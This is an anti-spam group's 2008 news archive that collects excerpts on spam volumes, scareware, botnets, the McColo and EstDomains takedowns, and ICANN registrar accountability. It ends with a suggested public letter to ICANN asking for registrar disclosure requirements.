News - 2008 Archive
Archived 2008 News, for current news click here
December 31, 2008
A federal judge has fined a Belize-based company $8,000 for each day it continues to flout his order to halt a major internet operation alleged to have duped more than 1 million computer users into buying bogus malware protection.
US District Judge Richard D. Bennett wrote in a ruling late last week that Innovative Marketing is in civil contempt for failing to comply with a temporary restraining order to stop its scareware campaign and turn over financial records. The judge imposed the fines after Sam Jain, the company's chief executive, and four other defendants failed to appear at a hearing.
(theregister.co.uk)
December 30, 2008
For six years CastleCops campaigned against internet fraud by running malware and phishing scam investigations and take-downs. CastleCops also ran volunteer training programs, as well as maintaining other services including computer virus clean-up assistance to ordinary punters.
(theregister.co.uk)
December 29, 2008
In a blow to anti-phishing efforts, the famed CastleCops organization dedicated to fighting spam and phishing quietly shuttered its site last week.
The all-volunteer organization investigated phishing and malware scams, and was credited with successfully derailing many of these attacks and phishing sites. CastleCops itself was also a constant target of distributed denial-of-service attacks and other scams.
(darkreading.com)
December 28, 2008
If 2007 was witness to the rise of the professional hi-tech criminal, then 2008 was the year they got down to work.
"The underground economy is flourishing," said Dan Hubbard, chief technology officer at security company Websense.
"They are not just more organised," said Mr Hubbard, "they are co-operating more and showing more business savvy in how they monetise what they do."
Statistics gathered by firms combating the rising tide of computer crime reveal just how busy professional cyber thieves have been over the last twelve months.
Sophos said it was now seeing more than 20,000 new malicious programs every day. 2008 was also the year in which Symantec revealed that its anti (news.bbc.co.uk)
December 27, 2008
The United States government has issued its own response and evaluation of ICANN's impending plan to open between 200-800 gTLDs for sale at $185,000 per domain and $60,000 per year. Many of the government's concerns (the report contains statements from both Merideth Baker, Acting Assistant Secretary for Communications and Information and Deborah A. Garza, Acting Assistant Attorney General) mirror those we raised last week.
(arstechnica.com)
December 26, 2008
Nine in ten emails are now spam with an estimated 200bn junk mail messages a day clogging up the internet, according to a new report by networking and security giant Cisco.
Drive-by download attacks - planting redirection scripts on legitimate sites that lead onto hacker controlled websites full of exploits - have become a popular method for spreading all forms of malware, including botnet clients that turn PCs into spam-churning zombies.
The US is the single biggest source of spam, accounting for 17.2 per cent of junk mail. Other big offenders include Turkey (9.2 per cent), Russia (8 per cent), Canada (4.7 per cent), Brazil (4.1 per cent), India (3.5 per cent), South Korea (3.3 per cent), Germany and the UK (2.9 per cent each).
December 25, 2008
A New Zealand man said to be at the helm of one of the world's most prolific spam enterprises has agreed to pay fines totalling $92,715 (about US $63,400) after admitting his role in an operation that spewed billions of junk messages in recent years.
Lance Atkinson, 26, paid the paltry amount "because of his co-operation and candour with authorities at an early stage" according to The Sydney Morning Herald. He could have been forced to pay double that amount. (theregister.co.uk)
December 24, 2008
You have arrived at the CastleCops website, which is currently offline. It has been our pleasure to investigate online crime and volunteer with our virtual family to assist with your computer needs and make the Internet a safer place. Unfortunately, all things come to an end. Keep up the good fight folks, for the spirit of this community lies within each of us. We are empowered to improve the safety and security of the Internet in our own way. Let us feel blessed for the impact we made and the relationships created.
(castlecops.com)
December 23, 2008
Commonwealth Security and Risk Management staff have been reviewing multiple reports of newly purchased Universal Serial Bus (USB) storage devices containing malicious software. Our recommendations are included below as some of the vulnerabilities may have significant impact for the Commonwealth Information Security community.
USB storage devices are being contaminated with malicious software prior to delivery to the customer (i.e.. Somewhere during the time period of manufacturing through distribution). The types of USB storage devices containing malicious software include USB flash/thumb drives, USB portable hard drives, USB digital photo frames, USB flash based MP3 players, and USB memory cards. The malicious software installed on the USB storage device could be virus or Trojan applications that may allow a malicious individual to steal information from the computer or expose the computer to additional malicious software. Please be particularly careful during this holiday season due to the high volume of USB storage devices purchased during this time.
(csirc.vita.virginia.gov)
December 22, 2008
"
several people have already asked for an app that will let you
forward your spam folder to Knujon, SpamCop and the like and there is
still nothing to seriously handle spam. Google has a great filter, but
filters are an ineffective way of stopping spam (90%+ of all email is
spam). The only way to really stop spam is to attack it upstream. I am
going to ask for this until a solution arrives." (groups.google.com)
December 21, 2008
"
While many bloggers and mainstream tech pundits are pulling together their legitimate “Best of 2008” column or “Trends for 2009” predictions, I thought I’d take a different approach this holiday season. I’d like to send best holiday wishes to those tireless workers (and their army of 24/7 zombie computers) who craft the spam that fills up our in-boxes.
...
10) (And last but seriously) Kudos to the folks at Knujon for doing a great job of reducing spam for all of us!
(blogs.zdnet.com)
December 19, 2008
"Our research has revealed a smoking gun that shows that Storm and other botnet spam generates commissionable orders, which are then fulfilled by the supply chains, generating revenue in excess of $150 million per year."
-Patrick Peterson, vice president of technology at IronPort
IronPort's research revealed that more than 80 percent of Storm botnet spam advertises online pharmacy brands. This spam is sent by millions of consumers' personal computers, which have been infected by the Storm worm via a multitude of sophisticated social engineering tricks and web-based exploits. Further investigation revealed that spam templates, "spamvertized" URLs, website designs, credit card processing, product fulfillment and customer support were being provided by a Russian criminal organization that operates in conjunction with Storm.
(ecommerce-journal.com)
December 18, 2008
In most cases pharmacies offering drugs without a prescription or a doctor’s review are fraudulent and illegal and which is more they may have nothing to do with the medicine industry at all and represent spam or malware agents.
(ecommerce-journal.com)
December 17, 2008
Until Microsoft finds a fix for a security flaw in Internet Explorer that could allow criminals to take control of computers and steal passwords experts are warning people to use a different browser.
Microsoft said at least seven versions of its popular Internet Explorer web browser, which is used by most of the world's computers, are vulnerable to this security flaw. About 10,000 websites have been compromised so far as Microsoft races to find a security patch.
(allheadlinenews.com)
Microsoft: Big Security Hole in All IE Versions (washingtonpost.com)
December 16, 2008
The big picture, according to [ScanSafe], is that we'll see more of the same, in particular greater volumes of Web-borne malware, over the next year -- with much of the more finitely-targeted varieties expected to arrive, specifically campaigns aimed at companies handling real money, such as banks and credit card processors.
ScanSafe predicted that customized threats targeted at publicly-held companies will likely continue to rise in '09, though it said that many of those attacks will actually be aimed at stealing valuable intellectual property, versus personal data. A full range of threats including everything from rootkits to password stealers will be enlisted to that end, the researchers said.
Overall, users will likely be exposed to a rising rate of 6 percent more Web-based attacks per month across 2009, the experts said. That equates to a 16 percent increase in attacks over the course of the entire twelve months.
(eweek.com)
December 15, 2008
Attorney General Michael Mukasey said the long-running and far-reaching case began with a single lead from Australian police in what became known as Operation Koala in Europe and Operation Joint Hammer in the United States.
"From that initial horrible discovery, the investigation grew to reveal connections in nearly 30 countries around the world," Mukasey said.
19 arrested over 'worst ever' internet child porn bust (computerworld.co.nz)
23 Australians caught in global child porn ring bust (livenews.com.au)
December 14, 2008
It was observed that one month after McColo went offline, spam volumes were nearly back to the levels seen prior to the company’s take down by its upstream Internet providers. However, as one fraud expert noted spam wasn’t the only issue held by McColo Corp. More evidence proved that retail fraud dropped significantly on the same day start to appear. In fact Ori Eisen, founder of 41st Parameter observed that about a quarter of a million dollars worth of fraudulent charges the company faced everyday came to a halt.
(ecommerce-journal.com)
December 13, 2008
Internet security is broken, and nobody seems to know quite how to fix it.
Despite the efforts of the computer security industry and a half-decade struggle by Microsoft to protect its Windows operating system, malicious software is spreading faster than ever. The so-called malware surreptitiously takes over a PC and then uses that computer to spread more malware to other machines exponentially. Computer scientists and security researchers acknowledge they cannot get ahead of the onslaught.
(nytimes.com)
December 12, 2008
Power has been shutdown to Coldrain.net by an ice storm.
Coldrain.net may be down for the weekend. Junk samples can still be uploaded to
KnujOn.com
December 8, 2008
Anyone who has actually taken the time to look at their junk email may notice many
spams in Russian or other Cyrillic alphabet languages.
The non-Russian speaking spam victim probably wonders what they are looking for. Well, in many cases
they are recruiting spammers to advertise the human traffic trade. clickcashmoney.com wants to hire
affiliates to push dosug.nu, paying them for the numeber of clicks they deliver.
dosug.nu offers “virtual sex”, but directs visitors to elitegirls.nu which has “galleries” of girls
asking 13000-30000 Rubles for an hour (about $500-$1100).
While this appears to be an Eastern European operation, clickcashmoney.com is sponsored by
INTERCOSMOS MEDIA GROUP in the United States, the other two .NU sites are as as far
from the Volga as possible. The tiny island of Niue (.nu) is no stranger to international intrigue,
allowing owners of cooperate trusts to remain secret, a frequent tool of money launderers. However,
the owners of these sites purport to be in another island nation, Cyprus with the sites actually
being hosted in the Netherlands. Confused yet? That's the point.
The breakup of the old Soviet Union, lawlessness in 1990's and booming economy have
made human sexual traffic fairly common in the former Soviet republics. Prostitution
is now big business in Russia and they are looking for spammers to promote the illicit traffic.
December 5, 2008
Spam continues to plague the Internet because a small number of large Internet Service Providers sell service knowingly to professional spammers for profit, or do nothing to prevent spammers operating from their networks.
Although all networks claim to be anti-spam, some network executives factor revenue made from hosting known spam gangs into corporate policy decisions to continue to sell services to spam operations. Others simply decide that closing the holes in their end-user broadband systems that allow spammers access would be too costly to their bottom lines.
The majority of the world's service providers succeed in keeping spammers off their networks and work to maintain a positive anti-spam reputation, but their work is undermined daily by the few networks who, out of corporate greed or mismanagement, choose to be part of the problem. The world's worst spam problem networks today are:
(spamhaus.org)
December 4, 2008
Italian president and media baron Silvio Berlusconi said today that he would use his country's imminent presidency of the G8 group to push for an international agreement to "regulate the internet".
Speaking to Italian postal workers, Reuters reports Berlusconi said: "The G8 has as its task the regulation of financial markets... I think the next G8 can bring to the table a proposal for a regulation of the internet." (theregister.co.uk)
December 3, 2008
Banks and online payment systems have been hacked before, but not quite like this. Rather than an attack on a
website or corporate network, this was a intrusion of the payment site's Registrar account at
Network Solutions. The intruder changed where the website would resolve to and instead of customers
logging into the real location they were handing their credentials to a server in the Ukraine which
attempted to deploy malware on the visitor’s computer. As we have discussed before, Registrars have an enormous
power and control over the Internet but questions about their duties and responsibilities are open. Registrars will often claim they simply sell domain names have no control over their use, but the creation of a domain name opens unlimited access and this must be viewed with a note of caution.
Online payment site hijacked by notorious crime gang
(theregister.co.uk)
Hackers Hijacked Large E-Bill Payment Site (washingtonpost.com)
December 2, 2008
SpamCop & KnujOn Complement One Another
The aged may remember that in posts long ago I had mistakenly been attempting to use SpamCop to perform the services of KnujOn. KnujOn appears interested in illicit spam, preventing the stealing of identities (and USD 600 million per annum, and lives taken by counterfeit medicines). However, the wheels of justice grind slowly (if at all). Reports of KnujOn's becoming personae non grata at ICANN are most encouraging, however. (Jon Postel is likely rolling in his grave at ICANN's choice to ignore crime.)
SpamCop blocks spam, quickly: as a side-effect, it reports the site's activities (to everyone up to ICANN, I wish) in a letter. I don't know whether it places the illicit store's site on the SCBL before it can claim more victims; but I hope it does. Both KnujOn's and SpamCop's services are important for me to use.
(spamcop.net)
December 1, 2008
In what can only be an act of angry revenge, websites are popping up with text from various news articles about KnujOn that
redirect the user's browser to sites spreading malware. The sites are either using fake anti-virus scareware or fake
media updaters.
klasik-mine.tryki.bij.pl/knujon.html --> myprivatetubes2009.net
n-sync.tryki.bij.pl/knujon.html --> antivirusbest-scan.com
3d-watch.miko.bij.pl/knujon.html --> antivirusdefense.com
November 30, 2008
After being stranded for weeks, a monster botnet responsible for an estimated 40 percent of the world's spam was able to briefly reconnect to its mothership in a tense international duel playing out online that could have a dramatic effect on the amount of junkmail flowing into inboxes everywhere.
The rogue network dubbed Srizbi was able to establish ties to a new master control channel using an emergency mechanism built into the 500,000 or so machines infected by the bot. Botherders designed the pseudo random domain name generator in the event their network got disconnected from the previous channel. That's precisely what happened earlier this month, when a network provider known as McColo was yanked offline.
(theregister.co.uk)
November 29, 2008
Social networking site Facebook today won an $873 million court judgment against a spammer who has been routinely deluging the site with sales pitches and sexually explicit messages.
According to an Associated Press report, the judgment against Adam Guerbuez of Montreal is the largest ever awarded under the U.S. CAN-SPAM Act. The award is more than three times as much as Facebook will gross in revenue this year.
Facebook doesn't expect to collect the money; the report states that Guerbuez has been "difficult to find" since he was sued in August. But social networking sites are hoping that such a large judgment will deter other spammers from abusing their sites.
(darkreading.com)
November 28, 2008
Since all the publicity, their operations split up and went to several other parts of the world like China or Turkey. But apparently, this kind of hosting is also present in some more Western parts of the world. A research paper was released and describes some of the activities located at a California based ISP.
(blog.security4all.be)
November 27, 2008
Last week, there was a lot of attention over the shutdown of McColo, a hosting company that was apparently used by a huge number of spammers to control some of the largest zombie botnets out there. While we were initially skeptical of just how big an impact this had (the press and some antispammers have "cried wolf" way too many times in the past on the impact of shutting down certain spam operations), the evidence in the days that followed suggested, indeed, that an awful lot of the world's spam was controlled via McColo. The Washington Post, which kicked off the shutdown by presenting evidence of McColo's spam connections to its upstream providers, is now digging deeper into how the whole operation worked.
(techdirt.com)
November 26, 2008
We have received official notice that EstDomains Accreditation was terminated November 24 and all domains held
by EstDomais will be transferred to Directi by no later than December 2nd.
History
281,000 Domains to be Transferred from EstDomains to Directi (icann.org)
ResellerClub to Take Over EstDomains-Sponsored Domain Names (news.softpedia.com)
Termination of Registrar EstDomains to Go Ahead (icann.org)
EstDomains Termination Delayed (icann.org)
ICANN Termination Letter 12 November 2008 (icann.org)
ICANN De-Accredits EstDomains for CEO's Fraud Convictions (voices.washingtonpost.com)
ICANN Terminates Accreditation of Notorious Malware Hosting Domain Registrar EstDomains (news.softpedia.com)
Three cheers for ICANN! (avertlabs.com)
RBN Farewell To Estdomains (rbnexploit.blogspot.com)
One criminal Internet registrar down... (weblog.infoworld.com)
USA Internet community fighting against botnet purveyors
Phishing and Fraud - ICANN Heeds Call to Ban Abusive Registrars
InterCage Back Up - Blames EstDomains for Their Woes
KnujOn.com Calls on Internet Community to End the Fake Pharmacy Menace
More Follow-up And Fallout
EstDomains Continues to Deny Real Location
EstDomains: A Sordid History and a Storied CEO
Atrivo and ESTDomains
Directi Responds to KnujOn Report - Dumps Controversial Service
EstDomains Controversy Continues
SpamHaus Backs-Up HostExploit Report/Wash Post Article
Examining the Role of Registrars in Illicit Activity
Underground Steroid Websites Flourish at U.S. Registrars
Steroid Sites Registered Through EstDomains
November 24, 2008
(senderbase.org)
November 22, 2008
Many of the domains maintained by EstDomains are used in illegal operations.
Following their decision to terminate the registrar accreditation agreement for EstDomains, ICANN (Internet Corporation for Assigned Names and Numbers) was looking for registrars interested in receiving a bulk transfer of all the domains maintained by the Estonian company. It looks like that registrar will be Directi-owned ResellerClub, which already started sending notification e-mails regarding the upcoming change to EstDomains customers.
EstDomains is a company that up to this point functioned as an ICANN-accredited domain name registrar. Originally founded in Estonia, the company is also incorporated in Delaware, US, and managed to become the work subject of many security groups because it provided domain registration services to numerous cybercriminal gangs. The company was named in multiple reports from the anti-spam group KnujOn or in HostExploit's extensive Atrivo – Cyber Crime USA report.
(news.softpedia.com)
Dodgy Domains Dumped by ISPs (pcworld.com)
November 19, 2008
LegitScript is pleased to announce that in the last month, and mostly in the last week, LegitScript has been able to effectuate the shut-down of nearly 500 "rogue" Internet pharmacies. All of the websites were no-prescription-required online pharmacies. All violated several laws and/or accepted medical or pharmaceutical safety standards. For example:
- All of the websites dispensed prescription drugs, sometimes controlled substances, without requiring a valid prescription.
- Most of the drugs were not FDA-approved, by virtue of being illegally imported into the US. In some cases, the drugs were believed to be counterfeit or adulterated.
- Some of the websites sold anabolic steroids without requiring a valid prescription.
- Many of the websites violated intellectual property laws ("brandjacking"), including trademark laws, in the US and other countries.
Until recently, domain name registrars have declined to terminate a website unless it was engaged in spam or sending out viruses, or unless there was a court order to do so, sometimes arguing that it is outside of their ability to do so. The point of what we've done is to show that registrars have the technical, contractual and legal ability to shut down these websites. And, we're pleased to report that we have had success in shutting down some of these rogue Internet pharmacies even when the registrar and the website registrant are both located outside of the United States.
We also want to acknowledge the hard work and assistance of knujon.com in this endeavor. The websites that have been shut down are a small portion of those actively operating. As the threat of prescription drug abuse and counterfeit drugs continues, LegitScript looks forward to continuing to work with your organization to reduce prescription drug abuse, enhance prescription drug safety and integrity, and improve Internet security.
(legitscript.com)
November 18, 2008
McColo, a network provider that was yanked offline following reports it enabled more than half the world's spam, briefly returned from the dead over the weekend so it could hand-off command and control channels to a new source, security researchers said.
The rogue network provider regained connectivity for about 12 hours on Saturday by making use of a backup arrangement it had with Swedish internet service provider TeliaSonera. During that time, McColo was observed pushing as much as 15MB of data per second to servers located in Russia, according to Paul Ferguson, a security researcher for anti-virus software maker Trend Micro.
The brief resurrection allowed miscreants who rely on McColo to update a portion of the massive botnets they use to push spam and malware. Researchers from FireEye saw PCs infected by the Rustock botnet being updated so they'd report to a new server located at abilena.podolsk-mo.ru for instructions. That means the sharp drop in spam levels reported immediately after McColo's demise isn't likely to last.
(theregister.co.uk)
KnujOn at VirusBuster (virusbuster.hu)
November 17, 2008
What's remarkable about the McColo and Intercage shutdowns is that they weren't initiated by law enforcement officials or via court order. Neither did they happen because either company was forced into bankruptcy or had other financial problems. Instead, both companies were forced offline when their upstream ISPs, acting upon information provided by security researchers, simply disconnected them and their customers from the Internet.
Others, though, say that the only people really opposed to the efforts of antispam and anti-malware groups are the cybercriminals themselves and those who support them for financial gain -- such as service providers that host spam sites. In addition, in the cases of both the McColo and Intercage shutdowns, the only role the security community played was to collect evidence showing conclusively that the two companies were hosting clients involved in all sorts of criminal activity, said Garth Bruen, founder of the antispam group KnujOn.
The actual decisions to pull the plug on the hosting companies was made by their service providers, not by the security researchers, Bruen said. "That was their choice to do it," he noted. "We just gave them the information to help them make up their mind."
Such cooperation between security researchers, ISPs and hosting companies can be very useful, according to Bruen. He pointed to a "very long dialogue" that KnujOn and HostExploit.com had with a large India-based hosting company named Directi that resulted in the latter agreeing to suspend "thousands and thousands" of domains that were allegedly being used to send spam or sell counterfeit drugs.
(computerworld.com)
Ragtag team ends 75% of all spam (indiatimes.com)
Get Your KnujOn - On (lockergnome.com)
November 16, 2008
During a presentation by Dr. Robert Bruen at ICANN's Cairo meeting, in which he was discussing the need
for more due diligence and better accounting in the Domain Name System, a Registrar representative complained it was impossible
for them verify the accuracy of all domain registrations. Some Registrars have as many a 7 million records and that is
just "too many" to check. At KnujOn we find this statement laughable for several reasons. Banks and credit card companies
process verifications on this scale regularly and KnujOn has calculated that we could verify the entire record set within a week.
Shame on the Registrars for throwing out such a weak dismissal. Unfortunately, this was in line with the general response to
KnujOn by the Registrars at this meeting.
Top501 IT: McColo shutdown won’t stop spam, malware, warn security experts (articles.top501.nu)
November 15, 2008
Microsoft Corp. founder Bill Gates' 2004 proclamation that the spam problem would be solved within two years has proved a bitter joke, with unsolicited messages doubling yearly to make up about 90% of mail transmitted on the Internet.
But this week, the tide turned. The number of unwanted, offensive and misleading e-mails sent across the globe plummeted by about two-thirds, to a mere 60 billion or so a day by Thursday, according to spam filtering companies.
The surprising respite had very little to do with the hundreds of millions of dollars that corporations and consumers have spent on anti-spam software or with the lawsuits and criminal cases brought against spammers in the last decade.
Instead, a ragtag band of researchers pulled off the unprecedented coup of drastically cutting the spam volume by adopting a new strategy: going after mainstream U.S. companies that can unknowingly help spammers, identity thieves and child porn purveyors by carrying their traffic on the Internet.
(latimes.com)
Spam plummets as gang leaves net
The closure of a web hosting firm that is believed to have had spam gangs as clients has led to a drastic reduction in junk mail.(news.bbc.co.uk)
November 14, 2008
"There are a dozen other shady pieces still out there that are not yet "active,'" said Bruen."The spammers are mercenaries. They get paid to promote a product, an illicit product. The people who pay them are going to demand better results or a refund, and the people paying them aren't very nice people, they're people with guns."
Bruen said that he and others are currently working on more research projects that will further unveil shady ISPs that host fraudulent and other illegal Web sites. And contrary to popular conceptions, numerous Internet providers hosting spam are actually located on U.S. shores, as opposed to being off-shore cyber criminals, Bruen said.
"We've been following a twisty road for several years and it did not necessarily lead us to dead ends and mysterious players. It led us to major Internet players and many in the United States," he said. "The next round [of research] may be even more shocking."
(crn.com)
Rogue and Fraudulent Security Software and Websites a Growing Threat
In my opinion the problem of rogue and fraudulent security software is quickly approaching epidemic proportions. I have seen a dramatic rise in the number of fraudulent applications and websites in the past few months to where there isn't a day that goes by where I don't come in contact with one or see one pop up. It used to be maybe once a month or so. And everybody is getting infected: my friends, relatives, co-workers, everyone is falling victim. Trend Micro says that 10 percent of all infections they see are caused by rogue software.(securityblahblah.blogspot.com)
November 13, 2008
The termination of ICANN-accredited registrar EstDomains is to go ahead, effective 24 November 2008.
On 28 October 2008, ICANN sent a notice of termination to EstDomains, Inc. (EstDomains) based on an Estonian Court record reflecting the conviction of EstDomains' then president, Vladimir Tsastsin, of credit card fraud, money laundering and document forgery.
Pursuant to Section 5.3 of the Registrar Accreditation Agreement (RAA), ICANN may terminate the RAA before its expiration when, "Any officer or director of [a] Registrar is convicted of a felony or of a misdemeanor related to financial activities, or is adjudged by a court to have committed fraud or breach of fiduciary duty, or is the subject of judicial determination that ICANN deems as the substantive equivalent of any of these; provided such officer or director is not removed in such circumstances."
ICANN received a response from EstDomains on 29 October in which it indicated that the Estonian Court record on which ICANN relied was not final and had been appealed. ICANN pended the termination of EstDomains' RAA to analyze the claims made by EstDomains and to obtain independent information regarding the status of the alleged appeal.
On 7 November 2008, EstDomains was informed that, based on ICANN's findings, ICANN was proceeding with the termination of EstDomains' RAA, effective 24 November 2008.
(icann.org)
Spam Volumes Drop by Two-Thirds After Firm Goes Offline(washingtonpost.com)
November 12, 2008
[Knujon contributed to this report]
HostExploit presents the second CYBER CRIME USA report which highlights those Internet players that currently host the world’s major spam botnets (an estimated 50% of spam worldwide), malware, rogue PC security products, cybercrime affiliate payment systems, and child pornography. This study from HostExploit.com is based on tracking and documenting ongoing cyber criminal activity. As a result of the first report focusing on Atrivo / Intercage and subsequent community actions, there was a quantitative drop of 10% of spam and malware worldwide. While temporary, it does clearly demonstrate that with a concerted and consistent effort by concerned commercial Internet network operators, a safer Internet can ensue.
On this occasion we focus on McColo and others that, like Atrivo / Intercage, actually operate from servers and depend on US transit peers. This open source security study sets out to quantify and continuously track cyber crime using numerous methods of measurement. In addition to original quantitative research and analysis, the study draws upon and welcomes the findings of other research efforts. What emerges is a picture of a front for cyber criminals who specifically target consumers in the United States and elsewhere. It provides hard data regarding specific current activity within McColo and associated networks, explains how consumers are targeted, and describes McColo's virtual network structure.
The philosophy behind the study is that we as an Internet community act in accordance with the ACM (Association of Computing Machinery) code of ethics, e.g. avoiding harm to others."Harm" means injury or negative consequences, such as undesirable loss of information, loss of property, property damage, or unwanted environmental impacts. This principle prohibits use of computing technology in ways that result in harm Internet users and the general public. It is the Internet security community’s responsibility to blow the whistle. While we do not take the actions to ‘stop’ the cyber criminals, we do urge those who provide connectivity or peering to consider this report and their role.
(hostexploit.com)
Web Hosting Firm Shuttered After Connection to Spammers is Exposed
The gleaming, state-of-the-art, 30-story office tower in downtown San Jose, Calif., hardly looks like the staging ground for a full-scale cyber crime offensive against America. But security experts say a relatively small Web hosting firm at that location is home to servers that help manage the distribution of the majority of the world's junk e-mail.
The servers are owned by McColo Corp, a Web hosting company that has emerged as a major U.S. base of operations for a host of international cyber-crime syndicates, involved in everything from the remote management of millions of compromised PCs to the sale of counterfeit pharmaceuticals and designer goods, fake security products and child pornography.
Multiple security researchers have recently published data naming McColo as a mother ship for all of the top robot networks or "botnets," which are vast collections of hacked computers that are networked together to blast out spam or attack others online.
Joe Stewart, director of malware research for Atlanta based SecureWorks, said that these known criminal botnets: "Mega-D," "Srizbi," "Pushdo,""Rustock" and "Warezov," have their master servers hosted at McColo
Officials from McColo did not respond to multiple e-mails, phone calls and instant messages left at the contact points listed on the company's Web site. But within hours of being presented with evidence from the security community about illegal activity coming from McColo's network, the two largest Internet providers for the company decided to pull the plug on McColo late Tuesday.
Global Crossing, a Bermuda-based company with U.S. operations in New Jersey, declined to discuss the matter, except to say that Global Crossing communicates and cooperates fully with law enforcement, their peers, and security researchers to address malicious activity.
(washingtonpost.com)
November 11, 2008
A U.S. based Web hosting firm that security experts say was responsible for facilitating more than 75 percent of the junk e-mail blasted out each day globally has been knocked offline following reports from Security Fix on evidence gathered about criminal activity emanating from the network.
For the past four months, Security Fix has been gathering data from the security industry about McColo Corp., a San Jose, Calif., based Web hosting service whose client list experts say includes some of the most disreputable cyber-criminal gangs in business today
(washingtonpost.com)
November 10, 2008
We're back in business, thanks for hanging in there folks!
November 9, 2008
Our apologies if your submissions are being rejected, it should be resolved shortly.
November 5, 2008
In an unusual and shocking move Dr. Robert Bruen was interrupted and silenced at an open,
cross-function ICANN meeting in Cairo Monday. At a meeting entitled:
"
Open Joint Session (GNSO, ccNSO, GAC, ALAC): Domain Name Space”
Dr. Bruen was handed the microphone in the question and answer portion. As he began speaking about the
problems of compliance and the need for better controls within the expanding Internet,
specifically in relation to criminal infiltration of the Domain Name space,
Patrick Sharry (ICANN ccNSO Consultant) stopped Dr. Bruen and said: "I don't want to pursue it any more in this forum."
Chris Disspain (CEO of Australian Domain Administration) followed this rare dismissal by saying:
“[if] it turns into an open microphone, then I, for one, won't be supporting it again.”
Meaning he would no longer support question and answer portions at ICANN sessions.
This was quite a shock after several other attendees were able ask lengthy questions uninterrupted. However, Dr.
Bruen should have known he was walking on thin ice. Once he introduced himself as a KnujOn representative Patrick
Sharry told him to “keep it brief.”
This is somewhat reminiscent of Peter Dengate-Thrush’s
response to questions from KnujOn’s Garth Bruen at the Washington D.C. ICANN Session entitled: “Improving Institutional Confidence consultation” KnujOn brought
up issues of criminality, contract violations, and exclusion of the Internet consumer. Dengate-Thrush admonished Bruen that
“this was not relevant to institutional confidence.” Later at this same session Dengate-Thrush told the audience
that he did not “want to hear from any more angry IP lawyers.” Many of the attendees were attorneys representing
brand holders being exploited by cyber-squatters and counterfeiters. The Intellectual Property community expressed its feeling of being marginalized by ICANN in favor of shadowy criminal interests.
So, as at the Cairo meeting, open forums only seem open if the panel wants to hear the question. The summary dismissal of Dr. Bruen can only be seen as prejudiced as it violates Sharry’s own ground rules for the session:
“…our joint SO and AC meeting is focusing on new gTLDs, IDN ccTLDs, and issues that run across that space.”
Dr. Bruen’s unasked and unanswered question concerned the fact that since the existing compliance structure is inadequate, how can ICANN ensure contractual compliance is enforced in a rapidly expanded Internet?
Furthermore, Sharry opened the session with this commitment:
“We will try, as we do that, on the way through, to involve a little bit of at least conversation, if not a little bit of conflict or argument or heated debate or discussion or something like that is(sic) well. And we will see how we go then, bringing the audience into that conversation.”
But, as we can see no debate or discussion was allowed.
Since the serious issue has emerged of Registrar Secrecy, we simply want to know if this will be allowed to continue within the new
Doamin Registrar space or will common-sense policy be implemented.
If the issues of contract violations, criminality in the Registrar community, and exclusion of the consumer are not relevant to improving institutional confidence, then what is?
KnujOn will be contacting Sharry and Disspain directly, as well as ICANN’s Ombudsman, to get a better explanation. We are speaking on behalf of the consumer and wont be silenced
Should Internet registrars be transparent? Let ICANN know! (infoworld.com)
Where Are the Registrars? (eweek.com)
ICANN De Facto Sanctioning of Domain Registrar Secrecy? (eweek.com)
KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
November 3, 2008
Last Friday, ICANN listed six steps being taken to ensure that the provisions of the RAA with regard to WHOIS information are followed correctly. And in nearly every article we have published here at The Industry Standard about ICANN policy, we are reminded that the public can recommend changes to the RAA, which is currently undergoing revision.
What is most interesting about the ICANN WHOIS focus, is that the registrars themselves are not subject to the same strict information regulation. One of the easiest ways to spot spammers, malware distributors, or other illegal activity associated with domains online has been the ability to check a registrant's WHOIS information. Falsified or missing information is often an indicator of a fly-by-night registrant, or one unwilling to provide real information due to their unscrupulous activities. As a result, false information is one of the biggest complaints concerning ICANN's registrar enforcement; the Registrar Accreditation Agreement (RAA) requires that registrars get complete and verifiable information from the customers they register.
(thestandard.com)
Where Are the Registrars? (eweek.com)
ICANN De Facto Sanctioning of Domain Registrar Secrecy? (eweek.com)
KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
November 2, 2008
So many of the problems we are experiencing on the Internet (spam, phishing, counterfeit product traffic,
malware distribution, network intrusions, online fraud, etc.) are enabled by secrecy within the
service provider community, specifically among certain Registrars. Note some of the following recent issues:
In any other industry, this would be intolerable. Unfortunately, there is no provision in the
Registrar Accreditation Agreement(RAA) that
requires a Registrar to disclose their location. Several unscrupulous companies have taken advantage of this fact by deeply burying their location information and misdirecting the public to dead ends and red herrings. Consumers who complain to Registrars often find themselves ignored or even abused by Registrar staff.
You Can Help
The RAA is being re-written at this very moment. YOU as an Internet user and consumer have an opportunity
close a huge loophole that allows an unaccountable atmosphere to fester. In order to assist ICANN achieve its stated goal
of transparency and accountability, we propose a modification to the Registrar Accreditation Agreement (RAA), the core contract ICANN uses to issue certifications to Registrars. A review of the RAA is currently underway and KnujOn is seeking that the following language (or equivalent) be added to the RAA:
|
"All Accredited Registrars must submit main office location, including country,
to be publicly disclosed in ICANN web directory. Post Office boxes, Incorporation addresses,
and mail-forwarding locations will not be acceptable.
Registrars must also provide for public display the name of CEO or President.
ICANN must be notified within 30 days of a location or presiding officer change.”
|
This is suggested language. Any version that addresses the issues discussed above and meets
the requirements of public disclosure.
If you wish to support this proposal, please write a brief and polite email as an Internet user
to policy-staff@icann.org expressing
your concern about the lack of public Registrar disclosure and request that the new
version of the RAA include a section requiring owner and location disclosure. You may
use the suggested language above, your own version, or simply a personal statement of concern over
the issue. Anyone uncomfortable with contacting ICANN directly can forward their comments
KnujOn at: contact@knujon.com and we will include
your comments anonymously in a letter from KnujOn.
Suggested Letter
To: policy-staff@icann.org
Subject: Ending Registrar Secrecy in RAA
Dear ICANN RAA Consultation Staff,
I am writing to you to request a change in the Registrar Accreditation Agreement that will improve transparency and accountability. It has come to my attention as an Internet user that there is no requirement in the standard Registrar contract to that requires public disclosure of Registrar ownership or location. I am concerned that this loophole in the agreement opens the door to fraud, secrecy and consumer abuse. Please consider adding the following language or equivalent to the RAA:
"All Accredited Registrars must submit main office location, including country, to be publicly disclosed in ICANN web directory. Post Office boxes, Incorporation addresses, and mail-forwarding locations will not be acceptable. Registrars must also provide for public display the name of CEO or President. ICANN must be notified within 30 days of a location or presiding officer change.”
Without public disclosure there cannot be true transparency, accountability or trust. I appreciate your consideration.
Sincerely, YOUR NAME
|
You may also send these comments to the RAA Working Group here: raa-wg@atlarge-lists.icann.org OR
Submit comments through the ICANN contact form: http://www.icann.org/cgi/contact OR
